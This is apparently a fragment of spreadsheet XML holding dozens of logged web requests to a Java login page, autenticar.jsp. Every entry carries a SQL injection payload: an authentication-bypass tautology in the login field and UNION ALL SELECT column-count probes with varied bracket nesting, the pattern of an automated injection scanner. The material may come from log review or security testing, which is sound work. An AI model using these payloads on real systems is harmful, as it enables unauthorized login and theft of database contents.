    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854,9854#and(("unje"="unje</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306,306#and(("mhra"="mhra</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293,4293#and(("bdah"="bdah</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641#and(("pdbh"="pdbh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022,6022#and(("rvjh"="rvjh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853,4853#and(("crnp"="crnp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393#and(("dwkz"="dwkz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699,699#and(("ucut"="ucut</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111#and((("dgjj"="dgjj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140#and((("bawp"="bawp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068,6068#and((("uucr"="uucr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492,2492#and((("ozvr"="ozvr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235#and((("wahw"="wahw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183,7183#and((("sras"="sras</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162,5162#and((("donp"="donp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262#and((("qlcz"="qlcz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817,6817#and((("rfsj"="rfsj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772#and((("rlzd"="rlzd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758,5758#and"twvg"="twvg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539,4539#and"xuyx"="xuyx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789#and"wesj"="wesj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322,2322#and"nvxs"="nvxs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136,6136#and"ccbe"="ccbe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569#and"ujxb"="ujxb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328,7328#and"ldrl"="ldrl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532,6532#and"nauj"="nauj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500,5500#and"dpzi"="dpzi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069,4069#and"rlei"="rlei</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018,9018#and("ozcu"like"ozcu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993,9993#and("qjoc"like"qjoc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540#and("yqfh"like"yqfh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190,6190#and("xmsd"like"xmsd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301,5301#and("qdrx"like"qdrx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581,6581#and("stpg"like"stpg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207,2207#and("sowc"like"sowc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977,6977#and("wbxq"like"wbxq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687,9687#and("sspt"like"sspt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241#and("zwab"like"zwab</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087,1087#and(("umqf"like"umqf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412,412#and(("dsff"like"dsff</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453#and(("fljd"like"fljd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920#and(("zmdk"like"zmdk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243,4243#and(("zzsj"like"zzsj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355,8355#and(("ajds"like"ajds</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880#and(("ubcz"like"ubcz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369,1369#and(("sehu"like"sehu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630#and(("vwch"like"vwch</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650,3650#and(("qdjd"like"qdjd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963,9963#and((("ibtf"like"ibtf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888,1888#and((("rqki"like"rqki</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275,6275#and((("kkut"like"kkut</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956#and((("yrah"like"yrah</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963,1963#and((("odww"like"odww</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409,7409#and((("nzdz"like"nzdz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734,8734#and((("qbzo"like"qbzo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183#and((("zdmk"like"zdmk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065,9065#and((("pshk"like"pshk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367,6367#and((("zdwu"like"zdwu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888,2888#and"ovkh"like"ovkh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900,7900#and"akqo"like"akqo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984,2984#and"jnhx"like"jnhx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465,8465#and"kmmi"like"kmmi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519,4519#and"zede"like"zede</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925,5925#and"qmoz"like"qmoz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550,7550#and"ampu"like"ampu</t>
  </si>
  <si>
